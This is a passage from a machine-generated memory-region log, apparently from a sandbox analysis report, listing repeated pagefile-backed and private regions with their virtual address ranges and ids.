"pagefile_0x00000000044f0000" filename = "" Region: id = 10002 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10003 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10004 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10005 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10006 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10007 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10008 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10009 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10010 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10011 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10012 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10013 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10014 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10015 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10016 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10017 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10018 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10019 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10020 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10021 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10022 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10023 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10024 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10025 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10026 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10027 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10028 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10029 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10030 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10031 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10032 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10033 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10034 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10035 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10036 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10037 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10038 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10039 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10040 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10041 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10043 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10044 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10045 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10046 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10047 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10048 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10049 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10050 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10051 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10052 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10053 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10054 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10055 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10056 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10057 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10058 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10059 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10060 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10061 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10062 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10063 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10064 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10065 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10066 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10067 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10068 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10069 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10070 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10071 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10072 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10073 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10074 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10075 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10076 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10077 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10078 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10079 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10080 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10081 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10082 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10083 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10084 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10085 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10086 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10087 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10088 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10089 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10090 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10091 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10092 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10093 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10094 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10095 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10096 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10097 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10098 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10099 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10100 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10101 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10102 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10103 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10104 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10105 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10106 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10107 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10108 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10109 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10110 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10111 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10112 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10113 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10114 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10115 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10116 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10117 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10118 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10119 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10120 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10121 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10122 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10123 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10124 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10125 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10126 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 10127 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 10128 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 10129 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10130 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10131 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10132 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10133 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10134 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10135 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10136 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10137 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10138 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10139 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10140 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10141 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10142 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10143 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10144 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10145 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10146 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10147 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10148 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10149 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10150 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10151 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10152 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10153 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10154 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10155 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10156 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10157 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10158 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10159 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10160 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10161 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10162 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10163 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10164 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10165 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10166 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10167 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10168 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10169 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10170 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10171 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10172 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10173 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10174 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10175 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10176 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10177 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10178 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10179 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 